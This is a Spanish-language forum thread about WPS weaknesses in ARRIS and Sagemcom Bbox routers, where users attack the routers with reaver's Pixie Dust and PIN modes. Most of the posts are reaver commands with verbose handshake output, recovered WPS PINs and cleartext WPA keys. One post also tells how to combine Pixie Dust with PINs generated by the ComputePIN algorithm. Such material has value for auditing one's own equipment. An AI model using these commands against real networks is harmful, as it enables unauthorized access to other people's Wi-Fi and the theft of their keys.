El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 07-02-2019 20:32:45

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 108

WPS muere despues de que pixie me regale el PIN

Hola.

Hace un par de semanas estando en la ofi de un amiguete donde tiene algunos routers, estuvimos auditandolos. Uno de ellos, un arris (aqui en mexico arris es casi sinonimo de vulnerable a pixie y marca casi favorita de uno de los grandes ISPs de por aqui), enseguida me arrojo el PIN WPS, pero al intentar sacar la llave con el PIN, el WPS parecia muerto. Digo parecia porque agarraba el probe, sacaba el vendor del chipset, y ahi se quedaba perpetuamente. En ese momento y sin meterme mucho mas en el tema, lo achaque a la distancia a la que  podria estar el router siempre pensando que es completamente vunerable. Cabe recalcar que al volver a intentar sacar de nuevo el PIN, tampoco habia mas conversacion entre reaver y el router que la marca del chipset.

Probando el PIN que reaver me habia dado hacia unos segundos:

[[email protected] ~]# reaver -i wlan1mon -p XXXXXXXX -c 11 -b 2C:7E:81:XX:XX:XX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 11
[+] Waiting for beacon from 2C:7E:81:XX:XX:XX
[+] Received beacon from 2C:7E:81:XX:XX:XX
[+] Vendor: RalinkTe

Volviendo a intentar sacar el PIN que me habia hacia escasos minutos con el mismo comando:

[[email protected] ~]# reaver -i wlan1mon -K -c 11 -b 2C:7E:81:XX:XX:XX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 11
[+] Waiting for beacon from 2C:7E:81:XX:XX:XX
[+] Received beacon from 2C:7E:81:XX:XX:XX
[+] Vendor: RalinkTe

Ayer estuvimos de nuevo en la oficina de mi amiguete, y volvimos a intentarlo (las capturas de codigo que adjunto son de ayer). De nuevo me arrojo el PIN, y de nuevo se quedo reaver estancado sin mas comunicacion con el router que el vendor del chipset.

El caso es que ya ayer me interese algo mas e hice algunas cosas. Pudimos ponernos a pocos metros del router (la culpa ya no era de la distancia). No pude capturar ningun probe con wash, y  Airodump con la opcion --wps no dice que WPS estuviera activo. Recordemos que hacia pocos minutos que me habia dado el PIN con reaver.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH        UPTIME  WPS     ESSID
2C:7E:81:XX:XX:XX  -63       25        0    0  11   54  WPA2 CCMP       1d 18:41:54  0.0     ARRIS-XXXX 

Desgraciadamente no pudimos reiniciarlo por no dejar sin internet a los trabajadores, pero de momento y a falta de poder probar mas a fondo, mi conclusion es que una vez le sacas el PIN con reaver, el WPS muere por completo.

No se si se trate de alguna medida de seguridad, pero no le encuentro mucho sentido ya que esty seguro que una vez reiniciado, me escupa la llave con el PIN que ya tengo, y hay maneras de hacer que el usuario opte por el reinicio del router.

No se si esto es algo ya documentado, pero para mi es la primera vez que lo veo, y mas en routers que a priori son vulnerables completamente. Es el primer arris que veo que pasa esto, y he visto unos cuantos.

Espero en unos dias volver a poder interactuar con este aparato, y ya tratare de sacarle un probe con wash y ver que dice airodump sobre el estado del WPS antes de probar a colarle el PIN que me dio ayer.

Ultima edición por javierbu (07-02-2019 20:33:41)

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 08-02-2019 08:11:11

Patcher
waircut

Registrado: 14-01-2016
Mensajes: 597

Re: WPS muere despues de que pixie me regale el PIN

Lo que comentas es demasiado extraño, no creo que tenga nada que ver con ningún mecanismo de defensa. El proceso para pixie es el mismo que para probar un pin, la unica diferencia es que pixie solo necesita de los tres primeros mensajes M1, M2 y M3. Tiene que ser por otra cosa.

Desconectado

#3 08-02-2019 16:51:46

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,877

Re: WPS muere despues de que pixie me regale el PIN

Me he topado con un caso similar... Uno en siete años.
Se trata de la B-Box "Sensation" (lol con los nombres) hecha por SAGEMCOM, un router de la gama "[email protected]" .

bbox_pin_hack_2.jpg

Este dispositivo es vulnerable al ataque pixiewps y al algoritmo ComputePIN (mac a decimal)  pero se tiene un solo intento,
La primera vez que he probado he hecho el ataque pxiedust, he obtenido el PIN pero (sin que el router diga bloquearse) el PA no respondía más y no he obtenido la llave (ni otro m3).
He reiniciado el PA.
La segunda vez, en lugar de hacer pxiedust, he generado el PIN con el algoritmo Computepin, lo he mandado con -p y he obtenido la llave:

sudo reaver -p 80290087 -b 00:78:9E:  -c 1 -vv -n -i wlan1mon

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 00:78:9E:
[+] Associated with 00:78:9E: (ESSID: Bbox-)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 80290087.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 44:ae:aa:49:f1:8a:91:61:6c:87:c0:e5:fc:f0:d2:bf
[P] PKE: 47:08:30:ff:fc:33:da:da:93:c3:0c:26:c0:3b:02:29:2f:7a:83:97:eb:f7:1c:36:3c:77:8e:80:e2:33:55:9d:a1:a3:e2:0e:7d:a8:98:0d:4b:d6:5a:ac:5d:a8:e1:e8:8a:12:40:c9:39:29:9f:fc:4e:6e:85:76:58:ac:02:f1:e4:3e:aa:a0:bb:91:eb:60:08:3f:1d:f7:d4:83:10:95:7a:80:52:09:3d:63:ab:36:63:b2:8a:38:aa:1d:77:66:6b:51:af:b8:26:94:f5:cb:0e:d9:a0:ac:4c:9a:04:a1:71:5e:ea:4b:c7:52:08:6d:42:1b:4d:7f:44:03:c7:be:c5:c9:77:26:9a:6b:6f:2e:18:ec:af:a6:37:fb:d1:a5:ff:bc:ea:96:28:17:e4:2c:f4:dc:27:7d:db:c2:a7:23:57:c0:29:13:1b:65:76:90:69:aa:d7:ed:08:70:c8:f8:a0:5c:ac:bf:3e:e1:7f:5d:30:3e:9d:1f:cd:66:26:32
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Name: Celeno Wireless AP 2.4G
[P] WPS Model Number: CL1800
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: c3:8e:c6:84:52:01:86:f5:66:98:ea:5d:72:8d:32:8f
[P] PKR: d4:e0:04:27:0f:0e:25:f4:e3:7c:2e:79:d3:8d:0d:95:f2:9b:34:7b:f2:6f:92:54:6a:7e:a1:0e:e3:24:76:43:70:e0:a8:20:4b:4c:39:b1:bf:f9:2b:77:77:03:81:17:1c:d5:0a:19:a2:6e:65:43:ff:f2:7f:d3:9e:0f:a3:78:8e:b4:10:e0:b7:22:53:8d:c3:26:ef:86:5c:a5:ee:c1:20:ef:d0:59:93:54:4d:20:fc:23:86:2d:65:37:fa:75:52:10:0e:22:6a:fe:af:ea:cb:f7:47:86:eb:e8:fb:6d:ec:66:3a:ab:54:71:be:40:28:85:62:5a:08:89:4d:55:6c:1f:20:9a:ea:28:c1:86:71:7c:b5:56:28:4a:b0:f1:dd:1c:c3:06:22:14:f8:5c:a6:32:c2:06:de:4f:0d:b9:9e:6d:1d:d3:63:36:d6:50:8b:3f:ec:19:c0:16:ce:e2:31:a1:ac:4e:08:e5:1d:7a:8d:65:eb:29:de:3b:39:8a
[P] AuthKey: 8b:3d:4a:7e:86:1e:8f:be:52:a4:75:0a:ec:f7:67:6f:7c:0c:3b:af:77:df:5f:6e:98:54:fa:d6:cc:b7:b3:94
[+] Sending M2 message
[P] E-Hash1: 6a:7c:48:47:b4:cd:40:00:38:8d:3b:d7:2b:15:3e:4c:6a:6c:cd:0e:c6:95:33:be:9b:e8:87:47:aa:3a:5e:69
[P] E-Hash2: aa:5c:c8:ae:82:24:ab:a3:60:e3:0f:ab:64:bd:c1:fc:f9:e3:fb:70:20:76:28:e1:fe:33:ed:31:19:1e:18:95
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '80290087'
[+] WPA PSK: '53CFD733A237625EE57D5C4D2A2537'
[+] AP SSID: 'Bbox-'
[+] Nothing done, nothing to save.

Después he probado un ataque pixiedust pero está vez con el pin correcto ya generado.
Así ha funcionado (se ha hecho el pixewps y he podido otener la llave): 

  • El router acepta el PIN valido las veces que queramos y devolverá la llave las veces que queramos .

  • Pero si mandamos un PIN erróneo se "jode" el modo PIN y no se puede hacer nada

Digo "jodía" por no poder decir otra cosa...
...Los modos anunciados en los probes seguían siendo los mismos (ponía todo: label, pbc, kpd etc...)  y el valor del campo "WPS locked" tampoco cambiaba (sin bloqueo)
   Otro ejemplo de error por parte del ISP en la configuración del protocolo con su interfaz de gestión ultra capada. .
Porque desde la interfaz Bouygues no hay nada acerca del modo PIN, solo se habla de PBC y hay solo un  botón virtual. 

bbox_pin_hack.jpg

   
  Bouygues había tenido problemas en sus modelos anteriores para deshabilitar correctamente el WPS en modo PIN: Bbox : un ejemplo surrealista de brecha WPS


Al igual que con los routers afectados por la brecha PIN "NULL"; la interfaz no permite hacer nada con el modo PIN. Se supone que ni existe...
Pero tenemos en realidad un intento para mandar el PIN correcto.
Como dice Patcher no es lógico y no debería ocurrir pero me ha pasado también, en un caso (sobre miles).
Quizá este dispositivo ARRIS tenga un fallo similar en su configuración.

Desconectado

#4 12-02-2019 08:58:09

javierbu
Usuario

Registrado: 09-08-2018
Mensajes: 108

Re: WPS muere despues de que pixie me regale el PIN

Concuerdo que no es ningun mecanismo de seguridad, sino una mala configuracion del WPS, o incluso un error puntual de este aparato en concreto, ya que es bastante extra;o lo que pasa.

He vuelto a tener acceso al susodicho router y estas son las conclusiones:

pimer contacto y lo que nos cuenta airodump:

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS     ESSID
                                                                                                                                      
 2C:7E:81:XXXXX  -70       18        1    0   1   54  WPA2 CCMP   PSK  2.0     ARRIS-XXXX                                         
                                                                                                                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe   

Vemos que dice tener wps 2.0 activado

salida de wash -j -s

{"bssid" : "2C:7E:81:XXXXX", "essid" : "ARRIS-XXXX", "channel" : 1, "rssi" : -70, "vendor_oui" : "000C43", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Ralink Technology, Corp.", "wps_model_name" : "Ralink Wireless Access Point", "wps_model_number" : "RT2860", "wps_device_name" : "ARRIS_24GAP", "wps_serial" : "12345678", "wps_uuid" : "bc329e001dd811b286012c7e81fad752", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "9100", "wps_rf_bands" : "01", "dummy": 0}

Pasando reaver con el PIN que nos dio en nuestro ultimo encuentro:

[[email protected] ~]# reaver -i wlan1mon -p 16866263 -c 1 -b 2C:7E:81:XXXXXX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 2C:7E:81:XXXXXX
[+] Received beacon from 2C:7E:81:XXXXXX
[+] Vendor: RalinkTe
[+] Trying pin "16866263"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 2C:7E:81:XXXXXX (ESSID: ARRIS-XXXXXX)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '16866263'
[+] WPA PSK: '2WC456401657'
[+] AP SSID: 'ARRIS-XXXX'
[+] Nothing done, nothing to save.

Nos da la llave. Estaba seguro que pasaria esto.

Despues de esto, airodump sigue dando el mismo resultado que antes, es decir, sigue diciendo que WPS esta activo. Wash sigue dando el mismo resultado tambien. Sigue capturando el probe.

Vuelvo a pasar reaver para explotar pixie....

[email protected] ~]# reaver -i wlan1mon -K -c 1 -b 2C:7E:81:XXXXXX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 2C:7E:81:XXXXXX
[+] Received beacon from 2C:7E:81:XXXXXX
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 2C:7E:81:XXXXXX (ESSID: ARRIS-XXXX)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
[+] Nothing done, nothing to save.

Ahi se queda atascado....

Vuelvo a pasara airodump...

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS     ESSID
                                                                                                                                      
 2C:7E:81:XXXXXX  -69        6        0    0   1   54  WPA2 CCMP   PSK  0.0     ARRIS-XXXX                                          
                                                                                                                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                       

Y wash ya no agarra el probe.

WPS is dead!!

Cualquier intento (sacar PIN o usar el PIN que nos dio hace un rato la llave con reaver) esta es la salida:

[[email protected] ~]# reaver -i wlan1mon -p 16866263 -c 1 -b 2C:7E:81:XXXXXX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 2C:7E:81:XXXXXX
[+] Received beacon from 2C:7E:81:XXXXXX
[+] Vendor: RalinkTe

Y ahi se queda por los siglos de los siglos hasta nuevo reinicio

Conclusiones?

No se que pensar. Quiza sea un error concreto de este dispositivo concreto. Si me vuelvo a cruzar con algo similar, ya podria decir que es un error del modelo concreto, pero todo esta muy raro.

Ultima edición por javierbu (12-02-2019 09:17:16)

Desconectado

#5 12-02-2019 16:45:17

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,877

Re: WPS muere despues de que pixie me regale el PIN

Mi conclusión personal es que cuando nos cruzamos con un chipset ralink en un dispositivo nuevo  lo "más seguro" es hacer el ataque pixie dust empelando el PIN generado con algoritmo Computepin ( argumentos -K -p <zhao>)

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
7 1238 Hoy 14:00:56 por kcdtv
Pegado:
28 22519 Ayer 11:45:11 por kcdtv
Pegado:
Pegado:: Hostbase 1.2 está aqui por Koala  [ 1 2 3 7 ]
157 14196 20-07-2019 19:06:20 por Koala
26 14066 20-07-2019 04:29:14 por Hunter310#
4 177 18-07-2019 20:40:36 por Flashed

Pie de página

Información del usuario

Ultimo usuario registrado: Wyvern73
Usuarios registrados conectados: 0
Invitados conectados: 23

Estadisticas de los foros

Número total de usuarios registrados: 1,553
Número total de temas: 1,334
Número total de mensajes: 13,530

Máx. usuarios conectados: 74 el 13-11-2018 18:47:20